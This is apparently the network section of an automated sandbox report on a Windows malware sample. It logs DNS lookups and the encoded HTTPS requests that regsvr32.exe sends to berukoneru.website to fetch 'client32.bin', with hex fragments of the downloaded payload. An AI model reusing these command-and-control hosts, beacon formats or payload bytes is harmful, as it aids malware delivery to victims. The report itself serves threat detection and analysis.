                        Dec 14, 2021 10:33:57.226634979 CET | 443 | 49787 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.226720095 CET | 49787 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:57.227541924 CET | 49787 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:57.227566004 CET | 443 | 49787 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.378197908 CET | 443 | 49787 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:34:06.990562916 CET | 49795 | 443 | 192.168.2.5 | 79.110.52.144
                        Dec 14, 2021 10:34:06.990613937 CET | 443 | 49795 | 79.110.52.144 | 192.168.2.5
                        Dec 14, 2021 10:34:06.990704060 CET | 49795 | 443 | 192.168.2.5 | 79.110.52.144
                        Dec 14, 2021 10:34:06.991794109 CET | 49795 | 443 | 192.168.2.5 | 79.110.52.144

                        UDP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 14, 2021 10:33:56.145939112 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:33:56.164990902 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:33:56.364356041 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:33:56.382654905 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:33:56.425647974 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:33:56.444000959 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:33:56.735696077 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:33:56.753909111 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:06.972225904 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:06.988746881 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.185264111 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.205163956 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.244362116 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.262615919 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.430716991 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.448971033 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.580158949 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.596787930 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.788218975 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.792956114 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.804882050 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.810184002 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:07.811239958 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:07.826984882 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:08.269373894 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:08.285397053 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:08.324105024 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:08.340738058 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:08.428600073 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:08.445041895 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
                        Dec 14, 2021 10:34:08.793006897 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
                        Dec 14, 2021 10:34:08.812880993 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5

                        DNS Queries

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                        Dec 14, 2021 10:33:56.145939112 CET | 192.168.2.5 | 8.8.8.8 | 0xc7c | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.364356041 CET | 192.168.2.5 | 8.8.8.8 | 0xce4a | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.425647974 CET | 192.168.2.5 | 8.8.8.8 | 0xcd9e | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.735696077 CET | 192.168.2.5 | 8.8.8.8 | 0x8d48 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:06.972225904 CET | 192.168.2.5 | 8.8.8.8 | 0x7b27 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.185264111 CET | 192.168.2.5 | 8.8.8.8 | 0x769b | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.244362116 CET | 192.168.2.5 | 8.8.8.8 | 0x2011 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.430716991 CET | 192.168.2.5 | 8.8.8.8 | 0xf508 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.580158949 CET | 192.168.2.5 | 8.8.8.8 | 0xfa | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.788218975 CET | 192.168.2.5 | 8.8.8.8 | 0x2a7c | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.792956114 CET | 192.168.2.5 | 8.8.8.8 | 0x714b | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.810184002 CET | 192.168.2.5 | 8.8.8.8 | 0x6f61 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.269373894 CET | 192.168.2.5 | 8.8.8.8 | 0x72a8 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.324105024 CET | 192.168.2.5 | 8.8.8.8 | 0x80a1 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.428600073 CET | 192.168.2.5 | 8.8.8.8 | 0xf677 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.793006897 CET | 192.168.2.5 | 8.8.8.8 | 0xb228 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:06.988746881 CET | 8.8.8.8 | 192.168.2.5 | 0x7b27 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.205163956 CET | 8.8.8.8 | 192.168.2.5 | 0x769b | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.262615919 CET | 8.8.8.8 | 192.168.2.5 | 0x2011 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.448971033 CET | 8.8.8.8 | 192.168.2.5 | 0xf508 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.596787930 CET | 8.8.8.8 | 192.168.2.5 | 0xfa | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.804882050 CET | 8.8.8.8 | 192.168.2.5 | 0x2a7c | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.811239958 CET | 8.8.8.8 | 192.168.2.5 | 0x714b | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:07.826984882 CET | 8.8.8.8 | 192.168.2.5 | 0x6f61 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.285397053 CET | 8.8.8.8 | 192.168.2.5 | 0x72a8 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.340738058 CET | 8.8.8.8 | 192.168.2.5 | 0x80a1 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.445041895 CET | 8.8.8.8 | 192.168.2.5 | 0xf677 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                        Dec 14, 2021 10:34:08.812880993 CET | 8.8.8.8 | 192.168.2.5 | 0xb228 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)

                        HTTP Request Dependency Graph

                        • berukoneru.website

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.54979579.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC0OUTGET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC0INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=qetl3urna05fer0cu0uej8os80; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49796 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-14 09:34:07 UTC | 209 | OUT | GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: berukoneru.website
2021-12-14 09:34:07 UTC | 210 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 14 Dec 2021 09:34:07 GMT
Content-Type: application/zip
Content-Length: 213639
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=703qcv2nu1i02fgfe68euftlm4; path=/; domain=.berukoneru.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49807 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-14 09:34:08 UTC | 1895 | OUT | GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: berukoneru.website
2021-12-14 09:34:08 UTC | 1896 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 14 Dec 2021 09:34:08 GMT
Content-Type: application/zip
Content-Length: 1869
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=9pokd33d23ohcifgffqmh7mjg6; path=/; domain=.berukoneru.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49808 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-14 09:34:08 UTC | 1898 | OUT | GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: berukoneru.website
2021-12-14 09:34:08 UTC | 1898 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 14 Dec 2021 09:34:08 GMT
Content-Type: application/zip
Content-Length: 1869
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=0egjoe75dvn618qck4vl9caql1; path=/; domain=.berukoneru.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1899INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        2 | 192.168.2.5 | 49797 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:07 UTC | 209 | OUT | GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC | 290 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=6e2b9843h042p8pk0q33ujpg11; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC | 290 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 306 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 434 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 450 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 466 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 499 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 515 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 531 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 547 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 563 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 579 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 595 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 611 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 627 | IN | Data Raw: [binary payload chunk not reproduced]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        3 | 192.168.2.5 | 49798 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:07 UTC | 628 | OUT | GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC | 629 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=6ibnq2u0g0h401bek74k8hvu83; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC | 629 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 645 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 661 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 677 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 693 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 709 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 725 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 741 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 757 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 773 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 789 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 805 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 821 | IN | Data Raw: [binary payload chunk not reproduced]
                        2021-12-14 09:34:07 UTC | 837 | IN | Data Raw: [binary payload chunk not reproduced]


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.54979979.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC838OUTGET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC | 838 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=tfmpovqco4irtlnkvm30nfl1s5; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC839INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
